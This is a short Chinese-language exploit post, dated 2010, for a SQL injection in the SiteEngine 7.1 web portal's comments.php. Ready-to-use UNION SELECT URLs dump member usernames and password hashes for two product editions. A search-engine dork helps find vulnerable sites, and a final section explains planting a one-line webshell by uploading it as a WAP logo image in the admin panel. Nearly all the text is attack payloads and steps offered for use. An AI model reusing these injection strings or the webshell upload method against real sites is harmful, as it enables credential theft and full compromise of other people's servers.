|
#标题: SiteEngine 7.1 SQL注入漏洞 #日期: 2010-11-25 #作者: Beach #Team: www.linux520.com #厂商: www.siteengine.net www.boka.cn #关键字: "Powered by SiteEngine" //300,000 +~ ################################################################################# [*]描述: 利用这个漏洞需要评论功能开启,默认开启 ################################################################################# [*]利用:
企业门户版本: [1]http://server/comments.php?id=1&module=newstopic+m,boka_newstopicclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,...,38,39+from+boka_members%23
[2]http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,...,26,27+from+boka_members%23
可能字段数不一样, 自己尝试 ================================================================================== 电子商务版本:
[+]http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,password,4,5,6,...,37,38+from+boka_members%23 ##################################################################################
其他版本类似 ################################################################################## [*]上Shell:
管理后台: http://server/admin/ 系统维护---> wap设置---> 请上传wap logo图 (有大小限制,10k以内,传一句话即可) ---> 确定--->马上浏览--->看图片属性即为一句话地址 ##################################################################################
|